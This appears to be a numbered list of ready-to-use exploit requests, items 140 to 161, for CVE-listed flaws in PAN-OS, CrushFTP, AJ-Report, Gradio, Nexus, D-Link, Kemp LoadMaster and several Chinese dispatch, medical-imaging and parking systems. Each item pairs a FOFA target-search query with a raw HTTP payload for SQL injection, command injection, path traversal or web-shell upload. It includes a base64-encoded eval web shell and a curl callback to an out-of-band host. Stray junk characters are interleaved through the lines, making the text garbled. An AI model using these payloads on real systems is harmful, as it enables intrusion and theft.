; e, X6 S1 Y. D NHost: x.x.x.x
/ J) p$ {" P2 xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0; B/ G* Q, Z) ?* L; d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
: C6 }2 K/ S; q' i- n* r `Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ ^ W% j9 e8 i3 Q: q
Accept-Encoding: gzip, deflate, br2 @9 E1 o' Z7 N* h
Connection: close
. J3 b. A' V- y% GCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
: D& S. e- w5 i8 KUpgrade-Insecure-Requests: 1$ O4 z* b+ |. z6 l( n0 ~
4 A# ?0 V. _ F) p, ]
V1 q2 ~( ^1 [, `1 c8 u1 k& E140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
) a+ q' u* z+ u* u+ eCVE-2024-2566
2 [4 n* e1 R: o) g) ?% X1 ^7 UFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
2 I2 ~( T4 a# E. D0 c3 U& c XGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.14 @, ~6 J% N2 u( v3 ?; w( s
Host: x.x.x.x* W- |5 P; p: P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0( F/ G- M5 G0 B+ l: l1 X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, m9 I, {& N3 ?+ f. @, n
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! ?2 w# D6 H( H3 J$ \) xAccept-Encoding: gzip, deflate, br; }! h1 `4 e$ s% t8 R& i
Connection: close
0 V- ]+ U# c* A5 w0 J- ?Cookie: authcode=h8g98 f$ f3 o2 Y5 ?
Upgrade-Insecure-Requests: 13 X0 `+ _' Y: v" h9 s' O
; z. D7 |, G5 z
; P- o! L" |% x6 q- `" S- q: Z# N4 k141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入2 @0 k( l) M) J+ L! b; {) [
FOFA:body="指挥调度管理平台"
' T7 X m2 U! `- }* V9 A: Z+ L2 hPOST /app/ext/ajax_users.php HTTP/1.1
: Q# G j( @& m( AHost: your-ip; l0 d4 F( }7 e5 `: D: ^/ R4 k
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
3 V3 X: H* u& c3 \5 W* wContent-Type: application/x-www-form-urlencoded% K# D8 m/ a" g2 W+ X1 |% D1 B
) l% X. I2 _$ C: y
* E% U: |9 ?. x; w1 G( L. A: edep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
+ a% Q+ Q6 Y- d! S/ e, g
! |) [0 @, e1 T p9 g; ]
% _% `. w& R$ R3 b6 g' R142. CMSV6车辆监控平台系统中存在弱密码
: |( X0 f: {$ o8 A- \CVE-2024-29666
) N2 h) C/ ^$ t4 D9 jFOFA:body="/808gps/"1 F' U) t [$ X0 m( j; ^, }) ?4 L# c
admin/admin& k0 X+ i4 y. F6 S8 X/ n
143. Netis WF2780 v2.1.40144 远程命令执行5 d: d; c" H. M6 K- B" Q. Y7 ^
CVE-2024-25850
3 a% C0 u+ [3 WFOFA:title='AP setup' && header='netis'
0 t b+ e1 q! X7 {9 {3 _% N/ Q' HPAYLOAD5 b2 W, e7 B; F' x* P u
$ e! D, L2 t" b' f2 B2 q; S144. D-Link nas_sharing.cgi 命令注入 z- l" ]: N$ {7 C0 z; A4 E
FOFA:app="D_Link-DNS-ShareCenter"
P3 U' V7 Z& N: R& k; Ysystem参数用于传要执行的命令% y2 D/ }& f5 O9 }6 s6 Z1 A. E8 M
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1' |, a$ @+ X- m+ }5 f7 Y
Host: x.x.x.x1 s4 T9 q, J$ }* [ g
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.06 \5 d. h% L5 o" I1 d! K
Connection: close5 Q5 t& r+ s/ K H
Accept: */*0 C" K5 P5 \- p4 K) N [9 v
Accept-Language: en) V+ h1 k8 P* F& j
Accept-Encoding: gzip
+ n2 W$ v" T6 X' U' d' ` Q. Q0 Z+ u* N6 P5 d
$ P- w0 v7 p6 ^+ j/ W4 c7 U
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
7 M/ ^7 {6 ]/ }; f/ a7 BCVE-2024-3400
# D- A8 F l& IFOFA:icon_hash="-631559155"6 |: g, P" s# P3 W9 Z
GET /global-protect/login.esp HTTP/1.1
/ i4 s4 D+ J* `, t mHost: 192.168.30.112:1005
$ O+ I) v! {! WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84 @- y0 r$ e- P* [* h2 D
Connection: close
0 D9 v2 V7 z# j# U; A( XCookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
7 B3 J; S# C' n" o3 }Accept-Encoding: gzip
& r& h% s, j6 D e9 R l
$ o% D4 w8 b# p1 k4 q& m& v' L4 ^
2 h3 a- ^ ~8 _" @3 S146. MajorDoMo thumb.php 未授权远程代码执行9 }7 \# Z- t& x' w) B
CNVD-2024-02175
# k! w. K: w5 Z/ w. R7 k9 f$ jFOFA:app="MajordomoSL"' S. E( y. k L! S+ P, O
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1( \; t+ R# S8 n" K
Host: x.x.x.x; Q/ R/ m5 H8 I! g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
# v( Q. j7 H5 s+ \Accept-Charset: utf-8
# |1 \+ o- U4 ~" H4 b% yAccept-Encoding: gzip, deflate
5 {+ Z* h X5 F0 @" [, u# U9 MConnection: close
9 Z% m3 B/ }+ G" ~
0 _; w& f6 J. }3 a, A
& v1 u2 N2 Q' _7 Y3 F147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
) Z! s' n8 V) k# j* E$ ^CVE-2024-32399; d4 Y$ v9 R( d5 u) I% G
FOFA:body="RaidenMAILD"7 B4 ~5 }$ E X7 z; i
GET /webeditor/../../../windows/win.ini HTTP/1.1! q0 `8 [- z* U/ W1 S6 F
Host: 127.0.0.1:81
% e3 K' E0 y. O) @. Y% _3 LCache-Control: max-age=0
( M" ]3 O2 D+ @0 MConnection: close
0 [' x) V1 M/ g
; x2 a5 }4 `: d$ @3 w! A, {" L
, n' q4 J" o5 V1 @' }148. CrushFTP 认证绕过模板注入
1 V( P& u; ?" n- e/ ZCVE-2024-4040
5 i6 P/ ?1 W, D2 _, eFOFA:body="CrushFTP"8 Z! M3 a* Z& h2 r d4 M
PAYLOAD
7 ?1 h1 ^! F. \/ w& D0 K( T9 H! \2 K! B
149. AJ-Report开源数据大屏存在远程命令执行* }4 C' Z$ I9 ^
FOFA:title="AJ-Report"
% x1 J$ Y G7 b0 |& l# t) Q7 v! w4 C+ X, U3 X
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
* V3 G5 @9 R: ?0 a4 IHost: x.x.x.x
4 a5 x! I* z* y+ s/ s6 bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
9 Q- i9 h8 v& ?( O+ F, \- R! HAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
0 F6 d( f! v7 Y' |Accept-Encoding: gzip, deflate, br7 O* F! I) i. l, r/ i
Accept-Language: zh-CN,zh;q=0.9
& b$ d' F6 { G; ^& {: eContent-Type: application/json;charset=UTF-8
" B$ S3 M8 a. {; [ f, H$ uConnection: close# z; a' R; Z: U/ T
w1 O! @. ? B) H4 F }1 `! l{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
6 K3 Q, @3 e4 d& p* I$ Q* \' ]0 o4 v% E* J- C6 S$ o( u
150. AJ-Report 1.4.0 认证绕过与远程代码执行
S3 _0 r: V a2 R, MFOFA:title="AJ-Report"
9 L$ f) `& y$ E0 e: P! K. ^POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
' K4 ]& l: F5 o; D3 KHost: x.x.x.x
" k* {. e& v& wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
! `% K- q3 e! w" nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 @& P2 z2 ^" }9 XAccept-Encoding: gzip, deflate, br2 x# U) c6 l- J: H! v# a
Accept-Language: zh-CN,zh;q=0.9
: s/ ?9 T4 G! ]" z+ eContent-Type: application/json;charset=UTF-8
. `3 {6 n7 ]6 l6 Q' L& pConnection: close' [1 l2 ^+ n8 M5 Y! j3 X
Content-Length: 339
, A7 Q4 ~0 Z; ~- M
& i1 }: e3 Y; o( A$ K1 F{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
( N. q6 W3 \ b; S5 q/ i" R+ h& I& A
6 p) k* Y9 X% u
151. AJ-Report 1.4.1 pageList sql注入+ T: j2 J6 R5 @. L+ b) k3 { w
FOFA:title="AJ-Report"
: {( T0 v7 r( [# y# S3 JGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
8 R" R: ?8 Q" d; x/ Y: QHost: x.x.x.x4 U6 Y" e7 o7 _3 S
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 c7 _. {& m& A1 OConnection: close
& W- y+ ]* W4 c) Y+ Z) GAccept-Encoding: gzip0 d$ U$ @- S+ M: [% o( {
' T0 i5 w S' I9 ^$ Z7 j
" o$ ?5 y( w U/ `! f' O9 q152. Progress Kemp LoadMaster 远程命令执行
* I9 Y1 p# l; n6 c, u! d3 ZCVE-2024-12126 ]4 C5 G* n1 L! B
LoadMaster <= 7.2.59.2 (GA)
: I7 j# G7 x8 J, Z8 I) ]3 wLoadMaster<=7.2.54.8 (LTSF)
2 h( S k$ ^7 ]LoadMaster <= 7.2.48.10 (LTS)
8 t" R, b3 U& JFOFA:body="LoadMaster"1 y- Z8 W% F* \% r4 u2 r
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
8 M; e" D1 C% b" QGET /access/set?param=enableapi&value=1 HTTP/1.1
+ D) a7 v: R) UHost: x.x.x.x
; {5 Q o) z/ M, _2 K$ u1 `User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
1 K. I' r; M, N8 H$ Y! Z0 y- vConnection: close# w/ Z- J/ H9 A1 w
Accept: */*
, F4 C# t U0 \7 f2 }6 GAccept-Language: en
7 ]$ A; [1 W5 T% k3 Z+ uAuthorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=# T& g. w3 K. @( `- h
Accept-Encoding: gzip
; m( J( |* f2 `& e% V) c
0 G9 x8 N0 O, h7 b: h, \& G
. X$ I1 ^! p2 u5 x153. gradio任意文件读取3 P# P4 h8 Q# `1 A' Z
CVE-2024-1561FOFA:body="__gradio_mode__"8 w/ R9 E+ Z* {
第一步,请求/config文件获取componets的id
" e1 x' L0 e. I- Xhttp://x.x.x.x/config/ H& s9 Q* y8 d2 g
K4 I4 T3 T! t. d5 N' x$ a0 a
6 j+ z2 [$ [2 [/ `; S, C1 n7 t- |2 i第二步,将/etc/passwd的内容写入到一个临时文件
+ |7 D) Q K/ GPOST /component_server HTTP/1.1! R5 t) H5 B: n5 C5 c
Host: x.x.x.x) E$ Z) c R+ C- i6 z6 N: L+ H$ U
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.34 H7 X: K, p0 y: v
Connection: close
$ y1 e, D$ r: g. x$ y9 x$ oContent-Length: 115
& U1 k- I3 U0 t; m/ ?" HContent-Type: application/json; L" y2 o& N& e4 b; Q8 B
Accept-Encoding: gzip
5 Y& R( o3 Z) y$ a t1 e
% x3 B% w. q9 i) J! e% f+ x{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
, H8 X' N9 n* D5 a5 f/ {
+ F+ g( Z( Q4 o, Y! O; t, z8 y* ^4 w* S: q* _* l
第三步访问
, m. Z4 R/ i- c: t1 |http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd( G- c- T5 u/ M0 l$ x8 \8 l# X
; m0 G/ [2 L w- s
# p* O: f: [7 f0 O* W154. 天维尔消防救援作战调度平台 SQL注入" q7 Z' d- J* h8 ?; q; N8 ]- L
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"2 _" t! U! m1 Y0 i
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
" ]4 J$ E- i! T# S( w3 bHost: x.x.x.x9 E* o. s3 G. h$ {. X, N$ c s- x9 \
Content-Length: 106
2 Y$ v' E# K7 fCache-Control: max-age=0
# l; `7 p6 J! ]- g% r! AUpgrade-Insecure-Requests: 1
$ s% @2 X' i( v4 O) O3 A* cOrigin: http://x.x.x.x' I+ o* b5 S1 w9 j- W0 a6 n f
Content-Type: application/json G, @5 q6 ]# {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
+ ?* t5 |7 Q! m& M( Q/ `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
$ y' m D0 X4 r6 `% ^" L3 hReferer: http://x.x.x.x/twms-service-mfs/mfsNotice/page% \8 Y$ @8 ~9 {. Y( p. V0 I
Accept-Encoding: gzip, deflate% _4 u1 X8 o- J! A% n1 R
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.70 J3 U+ Y0 U8 [! N
Connection: close
! @' l$ c8 {* D$ p- z! p8 b" \0 E0 w' w* @
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}2 k+ F' E5 ?9 |5 q
: U! \: W% T$ m& R
" z0 @( W% A. L( e/ ~$ V( x155. 六零导航页 file.php 任意文件上传9 m" l1 I6 Y& J G/ L3 T% M
CVE-2024-34982# K) t8 n2 W( q9 s& |3 @
FOFA:title=="上网导航 - LyLme Spage"6 ]& g& }, `- j5 J' }
POST /include/file.php HTTP/1.1
7 G% J7 Y! M+ h& kHost: x.x.x.x
9 G+ t7 S! {6 Q' r2 @4 S6 S9 SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.09 A2 b- u, d8 w6 N5 Y/ j; H2 e, L
Connection: close2 e' A* ]" D3 Z! C& |2 v' S/ W
Content-Length: 232
+ k; v; b; ^+ p4 N0 @Accept: application/json, text/javascript, */*; q=0.01
9 t6 r9 Y2 u. h9 s2 G3 x7 P& fAccept-Encoding: gzip, deflate, br
* p* A( m" \2 N# S# qAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( K; a: _. b, q2 u7 y y' ~Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
+ a- `: ], M4 K* ]- ^/ ~0 jX-Requested-With: XMLHttpRequest
5 C, T' ?' K9 V
% F) ~" u2 l# }8 [-----------------------------qttl7vemrsold314zg0f; h9 @1 p% o+ N5 C& o" \
Content-Disposition: form-data; name="file"; filename="test.php"
2 {- e0 |, z6 W6 L6 sContent-Type: image/png
1 l& i* ]: C2 B$ n# b
$ E0 P+ h5 P% g0 c# T+ @& s( V<?php phpinfo();unlink(__FILE__);?>
, W3 B1 Y3 J) {3 k-----------------------------qttl7vemrsold314zg0f--+ \% c, e4 i$ O& M; ?) g
5 X! C* ^( M C. G- X
% U+ [2 F8 z! V: J' N$ \7 N, R& z访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php9 S" T2 T0 w# q
$ H2 t0 Z6 T# O2 R4 V, [# Q156. TBK DVR-4104/DVR-4216 操作系统命令注入6 h0 d: z7 ~/ g
CVE-2024-37210 W9 [8 f2 k6 R. V1 R) D/ h3 H
FOFA:"Location: /login.rsp"
+ t _( a; K3 p- H+ Y·TBK DVR-4104
; a$ g; t7 u% N5 m0 L" q·TBK DVR-4216/ w9 z0 b/ }( ^3 j# P" v' ^
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"- q- m9 H p, I0 P! X0 y
7 d$ _, W( v, r+ r. @
@# ~4 Q9 H+ R$ A: x' T" Q9 L
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
1 B2 ~* v, f1 m1 Y1 u& KHost: x.x.x.x% S* Z9 _1 j2 N' b. @4 u7 }
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15* Z; O. M% ?3 v0 r
Connection: close7 E: w8 Y8 C! I' I
Content-Length: 0
, `$ y9 d! C, G5 T! GCookie: uid=1
0 b* `5 w" ]1 \5 p+ bAccept-Encoding: gzip% r8 r8 M3 F4 B* b5 b9 J+ s' G0 ?) R
% h! D" h/ Z* v0 ?# Z) C9 C4 j: n5 d% F& e9 n) T( j2 K/ }
157. 美特CRM upload.jsp 任意文件上传$ e: A1 |( p# v0 @
CNVD-2023-06971
* V6 z5 M. _4 A, _6 g- v& u2 c4 nFOFA:body="/common/scripts/basic.js"
# C% x6 ^* T% Q( V& K: JPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.14 X8 d3 R/ W2 V
Host: x.x.x.x. T% r0 Q4 g8 F* Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36$ N) U& R. ~) @+ n# Z) L/ x
Content-Length: 7090 h c+ d1 V- ]- C( E \3 [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
$ z( N8 d. _5 M6 [Accept-Encoding: gzip, deflate) c5 P, D/ x1 k4 k
Accept-Language: zh-CN,zh;q=0.9
: I% r8 a& F/ A; P. SCache-Control: max-age=0% u- }3 _& \& V% t
Connection: close1 n0 M* `3 J; _9 P2 @" m. I
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN8 a5 F3 w, Z% j% h# G7 h
Upgrade-Insecure-Requests: 1, [9 g8 v8 M x
' J3 C0 z" j) k: @4 j9 R------WebKitFormBoundary1imovELzPsfzp5dN; S* Q; {- |2 l9 o- i
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
/ j8 {* G+ \, X% E" b% UContent-Type: application/octet-stream
+ ^" d. ^5 L/ g3 r! l* V _% C* b% U; u/ S, {2 W2 x
nyhelxrutzwhrsvsrafb+ ^' G- `0 p* \8 R! @
------WebKitFormBoundary1imovELzPsfzp5dN
) z2 T$ w0 `1 ~" a; d+ p0 }Content-Disposition: form-data; name="key"7 A9 Y3 C+ w" u) R
) W1 F; N! O- r- q5 I
null# r4 `* c! K/ q. J. F/ R) M; J* U% ]
------WebKitFormBoundary1imovELzPsfzp5dN' j: g! d1 G; i1 \% J
Content-Disposition: form-data; name="form"
/ ]2 s! c7 a9 Y, J* n! n U9 `, |) @# O: J& o
null
6 ^2 G5 W+ g- f, }/ Y( l1 F, g------WebKitFormBoundary1imovELzPsfzp5dN
* r% C M8 E0 f1 ]1 E( ~/ X* LContent-Disposition: form-data; name="field"0 f( y5 E6 D5 w9 Z
" R ~& U* n T W9 e
null; W# s: @. {8 p( J0 E0 ^3 r
------WebKitFormBoundary1imovELzPsfzp5dN! t6 p& u2 L* M/ v
Content-Disposition: form-data; name="filetitile"- R! {9 t: u! ^7 `* M
* }) d( m1 C' V. k) _0 A
null8 ]; H' T8 g8 R0 }( I' w* Z
------WebKitFormBoundary1imovELzPsfzp5dN- }, o( c! r; E
Content-Disposition: form-data; name="filefolder"
7 e4 U# s& J' T
5 @0 b2 a @2 Wnull
. D" H$ E r7 y) C: T& U------WebKitFormBoundary1imovELzPsfzp5dN--
' g& b! ~/ c0 g _
9 ~9 m' P5 a2 N L4 ]6 ^, L; d% @; O+ Y+ M/ R% y
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp) w- a3 Q' L1 c1 C
# q7 q: ]) ~, ?; B
158. Mura-CMS-processAsyncObject存在SQL注入
5 m4 I m+ {# U4 d4 BCVE-2024-32640) G! i8 @+ Y4 E+ C* P" a
FOFA:"Generator: Masa CMS"
3 T. E% w: h, f( SPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
) a$ X" V+ `& r v5 x& h6 l8 ZHost: {{Hostname}}) z3 Y' |& W* w" p
Content-Type: application/x-www-form-urlencoded- r2 L. s ^ Z
% k7 r0 w$ M, \- @object=displayregion&contenthistid=x\'&previewid=11 M0 _+ f7 C7 n: R( x; Y
! P8 Q4 ]# `7 r( {: `5 }; O
8 f2 @. D! d* u, g7 N4 E159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传 u+ s5 W* V6 r) [( {* Q4 {
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")+ s: k @3 e2 [' g
POST /webservices/WebJobUpload.asmx HTTP/1.1$ ^; c# A: H5 X% X
Host: x.x.x.x- r4 m/ G' I7 D E% M& P- _# \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
P2 b0 j' A: s, `8 W3 bContent-Length: 1080
x6 U& N* A LAccept-Encoding: gzip, deflate' I5 w5 {" e( p7 h1 Q' n' r
Connection: close
1 a: h/ ~& V9 Y$ SContent-Type: text/xml; charset=utf-8+ G* I% ~/ I0 F: D* u
Soapaction: "http://rainier/jobUpload"& l( G# Y4 d. e. [. y
: h) a* T6 P8 l' x
<?xml version="1.0" encoding="utf-8"?># G) M$ R# f/ P8 R
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">& z( H- d$ w: e+ Z8 g
<soap:Body>
: y }& y% A1 e" w<jobUpload xmlns="http://rainier">8 R/ [* x& b% t2 l
<vcode>1</vcode>
3 p- ~! S& \/ C% r5 V/ D1 S8 k7 J<subFolder></subFolder>
1 g" H0 y# y1 @3 o! W% Y<fileName>abcrce.asmx</fileName>
+ O5 X4 @9 U, x+ D- Y; [<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
: s( n5 a0 ]2 N8 E2 `% k' L& K</jobUpload>: O. z( T. i; H3 {4 H7 ^5 _
</soap:Body>
2 k/ x# l7 Q2 y- e</soap:Envelope>
+ w+ M$ c' `& T' E7 }
! Y: q0 {& A) L1 B# p8 a* t5 t9 U! g. T0 v m2 W1 @* p
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")9 @$ ^* u; v: z7 }' T3 J
/ H' r6 p" H; a$ A( c( {
1 ?" H2 e! S9 C/ {2 j: W160. Sonatype Nexus Repository 3目录遍历与文件读取
; O5 B7 j9 W+ W) X: t( ICVE-2024-4956: T0 G) R* z7 a+ a4 L4 Q5 G
FOFA:title="Nexus Repository Manager"" v* H: R/ H# k5 U
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
$ g4 k: R& d `) M, ]Host: x.x.x.x
8 ^3 N8 I9 ]2 ~/ a4 Q( {* ZUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0 D- h/ J9 k8 {$ X3 ?* P
Connection: close v% \4 s+ u% j4 Q* s7 g
Accept: */*) u% L9 z; F3 ~1 m6 w; }2 F
Accept-Language: en- m* G. U- ~9 i5 z
Accept-Encoding: gzip- t, t- i4 N% c% @
' g- S) e, ^* W/ T
' V, [; |4 S0 m9 g* K& u9 t4 q; A
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传 S; h! }: b6 x/ D: J
FOFA:body="/KT_Css/qd_defaul.css"
, Z1 V% z! x; o' K' l/ M5 r第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密9 @9 J; V2 k5 u! c/ N
POST /Webservice.asmx HTTP/1.1+ R9 s' R7 P* x# c8 e& c* m
Host: x.x.x.x
) e* f: u Q6 s* JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
( T, k% V6 ?1 _5 y# |% z& L! RConnection: close1 J" G2 f* L: n; B; v
Content-Length: 445
& Z; M. i! g0 n5 J+ aContent-Type: text/xml
) }1 r5 h% i8 [: c' S! l# mAccept-Encoding: gzip# p$ `! k% \. D$ n" ?
0 s0 W- c, ?0 w8 u# R0 G/ C+ c<?xml version="1.0" encoding="utf-8"?>
- i) U$ {' _ l# G: r! u$ L9 g<soap:Envelope xmlns:xsi="
) m Z4 c8 `! K Y) Ahttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"0 `! d9 r }, @- o: `
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">. X" O4 f2 Z; G( @$ ?5 Q8 E
<soap:Body>6 |7 K1 h: p* v
<UploadResume xmlns="http://tempuri.org/">( a7 X# q1 t+ P8 H2 @- O
<ip>1</ip>
9 }3 K6 E8 d: a5 T1 U% t! O" P* N; G3 s<fileName>../../../../dizxdell.aspx</fileName>
1 Z \6 j3 i. r* w<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>/ W7 L1 n& ?5 I! u2 d. C8 n9 V a
<tag>3</tag>! g# k, _* x Y8 ?5 z9 b
</UploadResume>
0 L4 a( u! o# U</soap:Body>
7 D9 g6 t* }+ C* k% t</soap:Envelope>5 p. q; f9 p# o1 j) ?
